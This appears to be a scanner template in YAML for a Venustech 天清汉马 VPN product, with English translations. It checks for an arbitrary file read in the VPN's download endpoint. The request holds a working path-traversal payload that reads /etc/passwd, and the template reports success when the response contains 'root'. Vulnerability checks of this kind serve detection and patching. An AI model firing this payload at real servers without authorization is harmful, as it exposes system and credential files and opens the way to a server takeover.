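# English: arbitrary file read through the download interface of the 天清汉马VPN.
keyword: 天清汉马VPN
name: 天清汉马VPN接口download任意文件读取
# English: The download interface of the Venustech (启明星辰) 天清汉马VPN system has an
# arbitrary file read vulnerability. It exposes sensitive server data and
# configuration information, leaves the system insecure, and can lead to
# control of the server.
description: |
  启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞,获取服务器的敏感数据和配置信息,造成系统的不安全性,从而控制服务器
requests:
  # Empty means default or not enabled
  path: "/vpn/user/download/client?ostype=../../../../../../../etc/passwd"
  method: GET
  headers:
    User-agent:
    Content-length:
    Accept:
    Content-type:
    Accept-Encoding:
    Cookie:
    Referer:
    X-Forwarded-For:
  body-raw: |-
response:
  path: ""
  status-code: 200
  body: "root"
  headers:
    Server:
    Content-type:
    Content-length:
    Date:
    Connection:
# English: Disclosure of highly sensitive files such as databases.
impact: |
  数据库等高敏感度文件泄露。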